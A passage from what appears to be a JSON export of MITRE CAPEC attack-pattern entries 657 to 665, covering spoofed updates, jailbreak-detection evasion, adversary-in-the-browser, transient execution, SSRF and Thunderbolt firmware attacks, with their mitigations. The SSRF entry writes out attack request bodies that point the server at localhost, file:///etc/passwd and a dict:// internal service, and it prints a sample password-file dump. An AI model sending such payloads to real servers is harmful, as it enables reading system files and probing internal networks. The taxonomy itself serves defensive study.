adversary."]},"References":{"Reference":[{"External_Reference_ID":"REF-592"},{"External_Reference_ID":"REF-594"},{"External_Reference_ID":"REF-595"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-12-17"}}},"657":{"ID":"657","Name":"Malicious Automated Software Update via Spoofing","Abstraction":"Detailed","Status":"Draft","Description":"An attackers uses identify or content spoofing to trick a client into performing an automated software update from a malicious source. A malicious automated software update that leverages spoofing can include content or identity spoofing as well as protocol spoofing. Content or identity spoofing attacks can trigger updates in software by embedding scripted mechanisms within a malicious web page, which masquerades as a legitimate update source. Scripting mechanisms communicate with software components and trigger updates from locations specified by the attackers\' server. The result is the client believing there is a legitimate software update available but instead downloading a malicious update from the attacker.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"186","Exclude_Related":{"Exclude_ID":"403"}}},"Consequences":{"Consequence":{"Scope":["Access Control","Availability","Confidentiality"],"Impact":"Execute Unauthorized Commands"}},"Example_Instances":{"Example":"An example of the spoofing strategy would be the eTrust Antivirus Webscan Automated Update Remote Code Execution vulnerability (CVE-2006-3976) and (CVE-2006-3977) whereby an ActiveX control could be remotely manipulated by an attacker controlled web page to download and execute the attackers\' code without integrity checking."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"494"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1017","Entry_Name":"Application Deployment Software"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-12-17"}}},"660":{"ID":"660","Name":"Root/Jailbreak Detection Evasion via Hooking","Abstraction":"Detailed","Status":"Stable","Description":"An adversary forces a non-restricted mobile application to load arbitrary code or code files, via Hooking, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Adversaries may further leverage these capabilities to escalate privileges or bypass access control on legitimate applications. Although many mobile applications check if a mobile device is Rooted/Jailbroken prior to authorized use of the application, adversaries may be able to \\"hook\\" code in order to circumvent these checks. Successfully evading Root/Jailbreak detection allows an adversary to execute administrative commands, obtain confidential data, impersonate legitimate users of the application, and more.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"251"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify application with attack potential] The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).","Technique":"Search application stores for mobile applications worth exploiting"},{"Step":"2","Phase":"Experiment","Description":"[Develop code to be hooked into chosen target application] The adversary develops code or leverages existing code that will be hooked into the target application in order to evade Root/Jailbreak detection methods.","Technique":["Develop code or leverage existing code to bypass Root/Jailbreak detection methods.","Test the code to see if it works.","Iteratively develop the code until Root/Jailbreak detection methods are evaded."]},{"Step":"3","Phase":"Exploit","Description":"[Execute code hooking to evade Root/Jailbreak detection methods] Once hooking code has been developed or obtained, execute the code against the target application to evade Root/Jailbreak detection methods.","Technique":"Hook code into the target application."}]},"Prerequisites":{"Prerequisite":"The targeted application must be non-restricted to allow code hooking."},"Skills_Required":{"Skill":["Knowledge about Root/Jailbreak detection and evasion techniques.",{"Level":"High"},"Knowledge about code hooking.",{"Level":"Medium"}]},"Resources_Required":{"Resource":["The adversary must have a Rooted/Jailbroken mobile device.","The adversary needs to have enough access to the target application to control the included code or file."]},"Consequences":{"Consequence":[{"Scope":["Integrity","Authorization"],"Impact":"Execute Unauthorized Commands","Note":"Through Root/Jailbreak Detection Evasion via Hooking, the adversary compromises the integrity of the application."},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Access Control"],"Impact":"Read Data","Note":"An adversary may leverage Root/Jailbreak Detection Evasion via Hooking in order to obtain sensitive information."}]},"Mitigations":{"Mitigation":["Ensure mobile applications are signed appropriately to avoid code inclusion via hooking.","Inspect the application\'s memory for suspicious artifacts, such as shared objects/JARs or dylibs, after other Root/Jailbreak detection methods.","Inspect the application\'s stack trace for suspicious method calls.","Allow legitimate native methods, and check for non-allowed native methods during Root/Jailbreak detection methods.","For iOS applications, ensure application methods do not originate from outside of Apple\'s SDK."]},"Example_Instances":{"Example":["An adversary targets a non-restricted iOS banking application in an attempt to compromise sensitive user data. The adversary creates Objective-C runtime code that always returns \\"false\\" when checking for the existence of the Cydia application. The malicious code is then dynamically loaded into the application via the DYLD_INSERT_LIBRARIES environment variable. When the banking applications checks for Cydia, the hooked code returns \\"false\\", so the application assumes the device is stock (i.e. not Jailbroken) and allows it to access the application. However, the adversary has just evaded Jailbreak detection and is now able to glean user credentials and/or transaction details.","An adversary targets a mobile voting application on an Android device with the goal of committing voter fraud. Leveraging the Xposed framework, the adversary is able to create and hook Java code into the application that bypasses Root detection methods. When the voting application attempts to detect a Rooted device by checking for commonly known installed packages associated with Rooting, the hooked code removes the suspicious packages before returning to the application. As a result, the application believes the device is stock (i.e. not Rooted) when in actuality this is not the case. Having evading Root detection, the adversary is now able to cast votes for the candidate of their choosing as a variety of different users."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1055","Entry_Name":"Process Injection"}},"References":{"Reference":[{"External_Reference_ID":"REF-624"},{"External_Reference_ID":"REF-625"},{"External_Reference_ID":"REF-626"},{"External_Reference_ID":"REF-627"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-12-17"}}},"661":{"ID":"661","Name":"Root/Jailbreak Detection Evasion via Debugging","Abstraction":"Detailed","Status":"Stable","Description":"An adversary inserts a debugger into the program entry point of a mobile application to modify the application binary, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Rooting/Jailbreaking a mobile device also provides users with access to system debuggers and disassemblers, which can be leveraged to exploit applications by dumping the application\'s memory at runtime in order to remove or bypass signature verification methods. This further allows the adversary to evade Root/Jailbreak detection mechanisms, which can result in execution of administrative commands, obtaining confidential data, impersonating legitimate users of the application, and more.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"121"},{"Nature":"CanPrecede","CAPEC_ID":"68"},{"Nature":"CanPrecede","CAPEC_ID":"660"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify application with attack potential] The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).","Technique":"Search application stores for mobile applications worth exploiting"},{"Step":"2","Phase":"Experiment","Description":"[Debug the target application] The adversary inserts the debugger into the program entry point of the mobile application, after the application\'s signature has been identified, to dump its memory contents.","Technique":["Insert the debugger at the mobile application\'s program entry point, after the application\'s signature has been identified.","Dump the memory region containing the now decrypted code from the address space of the binary."]},{"Step":"3","Phase":"Experiment","Description":"[Remove application signature verification methods] Remove signature verification methods from the decrypted code and resign the application with a self-signed certificate."},{"Step":"4","Phase":"Exploit","Description":"[Execute the application and evade Root/Jailbreak detection methods] The application executes with the self-signed certificate, while believing it contains a trusted certificate. This now allows the adversary to evade Root/Jailbreak detection via code hooking or other methods.","Technique":"Optional: Hook code into the target application."}]},"Prerequisites":{"Prerequisite":"A debugger must be able to be inserted into the targeted application."},"Skills_Required":{"Skill":["Knowledge about Root/Jailbreak detection and evasion techniques.",{"Level":"High"},"Knowledge about runtime debugging.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The adversary must have a Rooted/Jailbroken mobile device with debugging capabilities."},"Consequences":{"Consequence":[{"Scope":["Integrity","Authorization"],"Impact":"Execute Unauthorized Commands","Note":"Through Root/Jailbreak Detection Evasion via Debugging, the adversary compromises the integrity of the application."},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Access Control"],"Impact":"Read Data","Note":"An adversary may leverage Root/Jailbreak Detection Evasion via Debugging in order to obtain sensitive information."}]},"Mitigations":{"Mitigation":"Instantiate checks within the application code that ensures debuggers are not attached."},"Example_Instances":{"Example":"An adversary targets an iOS banking application in an attempt to compromise sensitive user data. The adversary launches the application with the iOS debugger and sets a breakpoint at the program entry point, after the application\'s signature has been verified. Next, the adversary dumps the memory region that contains the decrypted code from the address space of the binary. The \'Restrict\' flag is then stripped from the application and the adversary resigns the application with a self-signed certificate. The application is now executed without the \'Restrict\' flag, while trusting the self-signed certificate to be legitimate. However, the adversary is now able to evaded Jailbreak detection via code hooking or other methods and can glean user credentials and/or transaction details."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"489"}},"References":{"Reference":[{"External_Reference_ID":"REF-625"},{"External_Reference_ID":"REF-626"},{"External_Reference_ID":"REF-627"},{"External_Reference_ID":"REF-628"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-12-17"}}},"662":{"ID":"662","Name":"Adversary in the Browser (AiTB)","Abstraction":"Standard","Status":"Stable","Description":{"p":"An adversary exploits security vulnerabilities or inherent functionalities of a web browser, in order to manipulate traffic between two endpoints. This attack first requires the adversary to trick the victim into installing a Trojan Horse application on their system, such as a malicious web browser plugin, which the adversary then leverages to mount the attack. The victim interacts with a web application, such as a banking website, in a normal manner and under the assumption that the connection is secure. However, the adversary can now alter and/or reroute traffic between the client application (e.g., web browser) and the coinciding endpoint, while simultaneously displaying intended transactions and data back to the user. The adversary may also be able to glean cookies, HTTP sessions, and SSL client certificates, which can be used to pivot into an authenticated intranet. Identifying AITB is often difficult because these attacks are successful even when security mechanisms such as SSL/PKI and multifactor authentication are present, since they still function as intended during the attack."},"Alternate_Terms":{"Alternate_Term":[{"Term":"Man in the Browser"},{"Term":"Boy in the Browser"},{"Term":"Man in the Mobile"}]},"Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"94"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"The adversary tricks the victim into installing the Trojan Horse malware onto their system.","Technique":"Conduct phishing attacks, drive-by malware installations, or masquerade malicious browser extensions as being legitimate."},{"Step":"2","Phase":"Experiment","Description":"The adversary inserts themself into the communication channel initially acting as a routing proxy between the two targeted components."},{"Step":"3","Phase":"Exploit","Description":"The adversary observes, filters, or alters passed data of their choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes."}]},"Prerequisites":{"Prerequisite":["The adversary must install or convince a user to install a Trojan.","There are two components communicating with each other.","An attacker is able to identify the nature and mechanism of communication between the two target components.","Strong mutual authentication is not used between the two target components yielding opportunity for adversarial interposition.","For browser pivoting, the SeDebugPrivilege and a high-integrity process must both exist to execute this attack."]},"Skills_Required":{"Skill":["Tricking the victim into installing the Trojan is often the most difficult aspect of this attack. Afterwards, the remainder of this attack is fairly trivial.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Ensure software and applications are only downloaded from legitimate and reputable sources, in addition to conducting integrity checks on the downloaded component.","Leverage anti-malware tools, which can detect Trojan Horse malware.","Use strong, out-of-band mutual authentication to always fully authenticate both ends of any communications channel.","Limit user permissions to prevent browser pivoting.","Ensure browser sessions are regularly terminated and when their effective lifetime ends."]},"Example_Instances":{"Example":[{"p":"An adversary conducts a phishing attack and tricks a victim into installing a malicious browser plugin. The adversary then positions themself between the victim and their banking institution. The victim begins by initiating a funds transfer from their personal savings to their personal checking account. Using injected JavaScript, the adversary captures this request and modifies it to transfer an increased amount of funds to an account that they controls, before sending it to the bank. The bank processes the transfer and sends the confirmation notice back to the victim, which is instead intercepted by the adversary. The adversary modifies the confirmation to reflect the original transaction details and sends this modified message back to the victim. Upon receiving the confirmation, the victim assumes the transfer was successful and is unaware that their money has just been transferred to the adversary."},{"p":"In 2020, the Agent Tesla malware was leveraged to conduct AiTB attacks against organizations within the gas, oil, and other energy sectors. The malware was delivered via a spearphishing campaign and has the capability to form-grab, keylog, copy clipboard data, extract credentials, and capture screenshots. [REF-630]"},{"p":"Boy in the browser attacks are a subset of AiTB attacks. Similar to AiTB attacks, the adversary must first trick the victim into installing a Trojan, either via social engineering or drive-by-download attacks. The malware then modifies the victim\'s \\"hosts\\" file in order to reroute web traffic from an intended website to an adversary-controlled website that mimics the legitimate website. The adversary is now able to observe, intercept, and/or modify all traffic, as in a traditional Adversary in the Middle attack (CAPEC-94). BiTB attacks are low-cost, easy to execute, and more difficult to detect since the malware often removes itself once the attack has concluded. [REF-631]"},{"p":"Man in the Mobile attacks are a subset of AiTB attacks that target mobile device users. Like AiTB attacks, an adversary convinces a victim to install a Trojan mobile application on their mobile device, often under the guise of security. Once the victim has installed the application, the adversary can capture all SMS traffic to bypass SMS-based out-of-band authentication systems. [REF-632]"}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"300"},{"CWE_ID":"494"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1185","Entry_Name":"Man in the Browser"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Man-in-the-browser attack"}]},"References":{"Reference":[{"External_Reference_ID":"REF-629"},{"External_Reference_ID":"REF-630"},{"External_Reference_ID":"REF-631"},{"External_Reference_ID":"REF-632"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"663":{"ID":"663","Name":"Exploitation of Transient Instruction Execution","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution to expose sensitive data and bypass/subvert access control over restricted resources. Typically, the adversary conducts a covert channel attack to target non-discarded microarchitectural changes caused by transient executions such as speculative execution, branch prediction, instruction pipelining, and/or out-of-order execution. The transient execution results in a series of instructions (gadgets) which construct covert channel and access/transfer the secret data.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"74"},{"Nature":"ChildOf","CAPEC_ID":"184","Exclude_Related":{"Exclude_ID":"403"}},{"Nature":"CanPrecede","CAPEC_ID":"141"},{"Nature":"PeerOf","CAPEC_ID":"212"},{"Nature":"PeerOf","CAPEC_ID":"124"},{"Nature":"PeerOf","CAPEC_ID":"180"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey target application and relevant OS shared code libraries] Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack.","Technique":"Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system."},{"Step":"2","Phase":"Explore","Description":"[Explore cache and identify impacts] Utilize tools to understand the impact of transient instruction execution upon address spaces and CPU operations.","Technique":"Run OS or application specific tools that examine the contents of cache."},{"Step":"1","Phase":"Experiment","Description":"[Cause conditions for identified transient instruction set execution] Adversary ensures that specific code/instructions of the target process are executed by CPU, so desired transient instructions are executed."},{"Step":"2","Phase":"Experiment","Description":"[Cause specific secret data to be cached from restricted address space] Executed instruction sets (gadgets) in target address space, initially executed via adversary-chosen transient instructions sets, establish covert channel and transfer secret data across this channel to cache.","Technique":["Prediction-based - adversary trains CPU to incorrectly predict/speculate conditions for instruction execution to be true, hence executing adversary-chosen transient instructions. These prediction-based methods include: Pattern History Table (PHT)/Input Validation Bypass, Branch Target Buffer (BTB)/Branch Target Injection, Return Stack Buffer (RSB)/Return Address Injection, and Store To Load (STL)/Speculative Store Bypass.","Exception/Fault-based - adversary has CPU execute transient instructions that raise an exception allowing inaccessible memory space to be accessed via out-of-order execution. These exception/fault-based methods include: Supervisor-only Bypass, Virtual Translation Bypass, System Register Bypass, FPU Register Bypass, Read-only Bypass, Protection Key Bypass, and Bounds Check Bypass."]},{"Step":"1","Phase":"Exploit","Description":"[Perform covert channel attack to obtain/access secret data] Adversary process code removes instructions/data from shared cache set, waits for target process to reinsert them back into cache, to identify location of secret data via a timing method. Adversary continuously repeat this process to identify and access entirety of targeted secret data.","Technique":["Flush+Reload - adversary frequently flushes targeted memory cache line using a dedicated machine flush instruction, and uses another process to measure time taken for CPU to load victim secret data.","Evict+Time - adversary causes victim to load target set into cache and measures time for victim process to load this data, setting a baseline. Adversary evicts a specified cache line and causes victim process to execute again, and measures any change in execution time, to determine if cache line was accessed.","Prime+Probe - adversary primes cache by filling cache line(s) or set(s) with data, after some time victim process evicts this adversary data to replace it with secret data. The adversary then probes/accesses all the previously accessed cache lines detecting cache misses, which determine that their attacker data has been evicted and replaced with secret data from victim process."]}]},"Prerequisites":{"Prerequisite":"The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU."},"Skills_Required":{"Skill":["Detailed knowledge on how various CPU architectures and microcode perform transient execution for various low-level assembly language code instructions/operations.",{"Level":"High"},"Detailed knowledge on compiled binaries and operating system shared libraries of instruction sequences, and layout of application and OS/Kernel address spaces for data leakage.",{"Level":"High"}]},"Resources_Required":{"Resource":["C2C mechanism or direct access to victim system, capable of dropping malicious program and collecting covert channel attack data.","Malicious program capable of triggering execution of transient instructions or vulnerable instruction sequences of victim program and performing a covert channel attack to gather data from victim process memory space. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources of the victim machine."]},"Indicators":{"Indicator":"File Signatures for Malicious Software capable of abusing Transient Instruction Set Execution"},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}]},"Mitigations":{"Mitigation":["Implementation: DAWG (Dynamically Allocated Way Guard) - processor cache properly divided between different programs/processes that don\'t share resources","Implementation: KPTI (Kernel Page-Table Isolation) to completely separate user-space and kernel space page tables","Configuration: Architectural Design of Microcode to limit abuse of speculative execution and out-of-order execution","Configuration: Disable SharedArrayBuffer for Web Browsers","Configuration: Disable Copy-on-Write between Cloud VMs","Configuration: Privilege Checks on Cache Flush Instructions","Implementation: Non-inclusive Cache Memories to prevent Flush+Reload Attacks"]},"Example_Instances":{"Example":{"p":"A web browser with user-privileges executes JavaScript code imbedded within a malicious website. The system does not disable shared buffers for the web browser and there is no restriction or check upon user-process execution of flush or evict instructions. The Javascript code executes vulnerable transient instructions upon system to cause microarchitectural changes that establish covert channel and transfer sensitive/secret data into shared cache from address space of either kernel, web browser or another executing process on the system."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1037"},{"CWE_ID":"1303"},{"CWE_ID":"1264"}]},"References":{"Reference":[{"External_Reference_ID":"REF-637"},{"External_Reference_ID":"REF-638"},{"External_Reference_ID":"REF-639"},{"External_Reference_ID":"REF-640"},{"External_Reference_ID":"REF-641"},{"External_Reference_ID":"REF-642"},{"External_Reference_ID":"REF-643"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"664":{"ID":"664","Name":"Server Side Request Forgery","Abstraction":"Standard","Status":"Stable","Description":{"p":"An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server\u2019s internal network, or to external third parties. If successful, the adversary\u2019s request will be made with the server\u2019s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server\u2019s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user\'s behalf."},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"115"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find target application] Find target web application that accepts a user input and retrieves data from the server"},{"Step":"2","Phase":"Experiment","Description":"[Examine existing application requests] Examine HTTP/GET requests to view the URL query format. Adversaries test to see if this type of attack is possible through weaknesses in an application\'s protection to Server Side Request Forgery","Technique":["Attempt manipulating the URL to retrieve an error response/code from the server to determine if URL/request validation is done.","Use a list of XSS probe strings to specify as parameters to known URLs. If possible, use probe strings with unique identifiers.","Create a GET request with a common server file path such as /etc/passwd as a parameter and examine output."]},{"Step":"3","Phase":"Exploit","Description":"[Malicious request] Adversary crafts a malicious URL request that assumes the privilege level of the server to query internal or external network services and sends the request to the application"}]},"Prerequisites":{"Prerequisite":"Server must be running a web application that processes HTTP requests."},"Skills_Required":{"Skill":["The adversary will have to detect the vulnerability through an intermediary service or specify maliciously crafted URLs and analyze the server response.",{"Level":"Medium"},"The adversary will be required to access internal resources, extract information, or leverage the services running on the server to perform unauthorized actions such as traversing the local network or routing a reflected TCP DDoS through them.",{"Level":"High"}]},"Resources_Required":{"Resource":"[None] No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Resource Consumption"}]},"Mitigations":{"Mitigation":["Handling incoming requests securely is the first line of action to mitigate this vulnerability. This can be done through URL validation.","Further down the process flow, examining the response and verifying that it is as expected before sending would be another way to secure the server.","Allowlist the DNS name or IP address of every service the web application is required to access is another effective security measure. This ensures the server cannot make external requests to arbitrary services.","Requiring authentication for local services adds another layer of security between the adversary and internal services running on the server. By enforcing local authentication, an adversary will not gain access to all internal services only with access to the server.","Enforce the usage of relevant URL schemas. By limiting requests be made only through HTTP or HTTPS, for example, attacks made through insecure schemas such as file://, ftp://, etc. can be prevented."]},"Example_Instances":{"Example":[{"p":["An e-commerce website allows a customer to filter results by specific categories. When the customer selects the category of choice, the web shop queries a back-end service to retrieve the requested products. The request may look something like:","A malicious user can modify the request URL to look like this instead:","or","or","If the exploit is successful, the server may return the data requested by the adversary"],"div":[{"class":"informative","p":["POST /product/category HTTP/1.0","Content-Type: application/x-www-form-urlencoded","Content-Length: 200","vulnerableService=http://vulnerableshop.net:8080/product/category/check%3FcategoryName%3DsomeCategory"]},{"class":"attack","p":["POST /product/category HTTP/1.0","Content-Type: application/x-www-form-urlencoded","Content-Length: 200","vulnerableService=http://localhost/server-status"]},{"class":"attack","p":"vulnerableService = file:///etc/passwd"},{"class":"attack","p":"vulnerableService=dict://localhost:12345/info"},{"class":"bad","p":["root:!:0:0::/:/usr/bin/ksh","daemon:!:1:1::/etc:","bin:!:2:2::/bin:","sys:!:3:3::/usr/sys:","adm:!:4:4::/var/adm:","uucp:!:5:5::/usr/lib/uucp:","guest:!:100:100::/home/guest:","nobody:!:4294967294:4294967294::/:","lpd:!:9:4294967294::/:","lp:*:11:11::/var/spool/lp:/bin/false","invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh","nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico","paul:!:201:1::/home/paul:/usr/bin/ksh","jdoe:*:202:1:My name:/home/myname:/usr/bin/ksh"]}]},{"p":"The CallStranger attack is an observed example of SSRF. It specifically targets the UPnP (Universal Plug and Play) protocol used by various network devices and gaming consoles. To execute the attack, an adversary performs a scan of the LAN to discover UPnP enabled devices, and subsequently a list of UPnP services they use. Once the UPnP service endpoints are listed, a vulnerability in the UPnP protocol is used to send these endpoints as encrypted to a verification server via the UPnP Callback method. Because the encryption is done on the client side, the server returns an encrypted list of services which is decrypted on the client side. The adversary then has a list of services running the vulnerable UPnP protocol, which the adversary can leverage to make spoofed requests. [REF-646]"}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"918"},{"CWE_ID":"20"}]},"References":{"Reference":[{"External_Reference_ID":"REF-644"},{"External_Reference_ID":"REF-645"},{"External_Reference_ID":"REF-646"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}}},"665":{"ID":"665","Name":"Exploitation of Thunderbolt Protection Flaws","Abstraction":"Detailed","Status":"Stable","Description":{"p":"An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow."},"Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"276"},{"Nature":"CanFollow","CAPEC_ID":"390"},{"Nature":"PeerOf","CAPEC_ID":"458"},{"Nature":"PeerOf","CAPEC_ID":"148"},{"Nature":"PeerOf","CAPEC_ID":"151"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey physical victim environment and potential Thunderbolt system targets] The adversary monitors the target\'s physical environment to identify systems with Thunderbolt interfaces, identify potential weaknesses in physical security in addition to periods of nonattendance by the victim over their Thunderbolt interface equipped devices, and when the devices are in locked or sleep state."},{"Step":"2","Phase":"Explore","Description":"[Evaluate the target system and its Thunderbolt interface] The adversary determines the device\'s operating system, Thunderbolt interface version, and any implemented Thunderbolt protections to plan the attack."},{"Step":"1","Phase":"Experiment","Description":"[Obtain and/or clone firmware image] The adversary physically manipulates Thunderbolt enabled devices to acquire the firmware image from the target and/or adversary Thunderbolt host controller\'s SPI (Serial Peripheral Interface) flash.","Technique":["Disassemble victim and/or adversary device enclosure with basic tools to gain access to Thunderbolt controller SPI flash by connecting adversary SPI programmer.","Adversary connects SPI programmer to adversary-controlled Thunderbolt enabled device to obtain/clone victim thunderbolt controller firmware image through tools/scripts.","Clone firmware image with SPI programmer and tools/scripts on adversary-controlled device."]},{"Step":"2","Phase":"Experiment","Description":"[Parse and locate relevant firmware data structures and information based upon Thunderbolt controller model, firmware version, and other information] The acquired victim and/or adversary firmware image is parsed for specific data and other relevant identifiers required for exploitation, based upon the victim device information and firmware version.","Technique":["Utilize pre-crafted tools/scripts to parse and locate desired firmware data and modify it.","Locate DROM (Device Read Only Memory) data structure section and calculate/determine appropriate offset to replicate victim device UUID.","Locate ACL (Access Control List) data structure and calculate/determine appropriate offsets to identify victim device UUID.","Locate data structure containing challenge-response key information between appropriate offsets."]},{"Step":"3","Phase":"Experiment","Description":"[Disable Thunderbolt security and prevent future Thunderbolt security modifications (if necessary)] The adversary overrides the target device\'s Thunderbolt Security Level to \\"None\\" (SL0) and/or enables block protections upon the SPI flash to prevent the ability for the victim to perform and/or recognize future Thunderbolt security modifications as well as update the Thunderbolt firmware.","Technique":"The adversary-controlled Thunderbolt device, connected to SPI programmer and victim device via Thunderbolt ports, is utilized to execute commands within tools/scripts to disable SPI flash protections, modify Thunderbolt Security Level, and enable malicious SPI flash protections."},{"Step":"4","Phase":"Experiment","Description":"[Modify/replace victim Thunderbolt firmware image] The modified victim and/or adversary thunderbolt firmware image is written to attacker SPI flash."},{"Step":"1","Phase":"Exploit","Description":"[Connect adversary-controlled thunderbolt enabled device to victim device and verify successful execution of malicious actions] The adversary needs to determine if their exploitation of selected vulnerabilities had the intended effects upon victim device.","Technique":["Observe victim device identify adversary device as the victim device and enables PCIe tunneling.","Resume victim device from sleep, connect adversary-controlled device and observe security is disabled and Thunderbolt connectivity is restored with PCIe tunneling being enabled.","Observe that in UEFI or Thunderbolt Management Tool/UI that the Security Level does not match adversary modified Security Level of \\"None\\" (SL0)","Observe after installation of Firmware update that within Thunderbolt Management UI the \\"NVM version\\" is unchanged/same prior to the prompt of successful Firmware update/installation."]},{"Step":"2","Phase":"Exploit","Description":"[Exfiltration of desired data from victim device to adversary device] Utilize PCIe tunneling to transfer desired data and information from victim device across Thunderbolt connection."}]},"Prerequisites":{"Prerequisite":"The adversary needs at least a few minutes of physical access to a system with an open Thunderbolt port, version 3 or lower, and an external thunderbolt device controlled by the adversary with maliciously crafted software and firmware, via an SPI Programming device, to exploit weaknesses in security protections."},"Skills_Required":{"Skill":["Detailed knowledge on various system motherboards, PCI Express Domain, SPI, and Thunderbolt Protocol in order to interface with internal system components via external devices.",{"Level":"High"},"Detailed knowledge on OS/Kernel memory address space, Direct Memory Access (DMA) mapping, Input-Output Memory Management Units (IOMMUs), and vendor memory protections for data leakage.",{"Level":"High"},"Detailed knowledge on scripting and SPI programming in order to configure and modify Thunderbolt controller firmware and software configurations.",{"Level":"High"}]},"Resources_Required":{"Resource":["SPI Programming device capable of modifying/configuring or replacing the firmware of Thunderbolt device stored on SPI Flash of target Thunderbolt controller, as well as 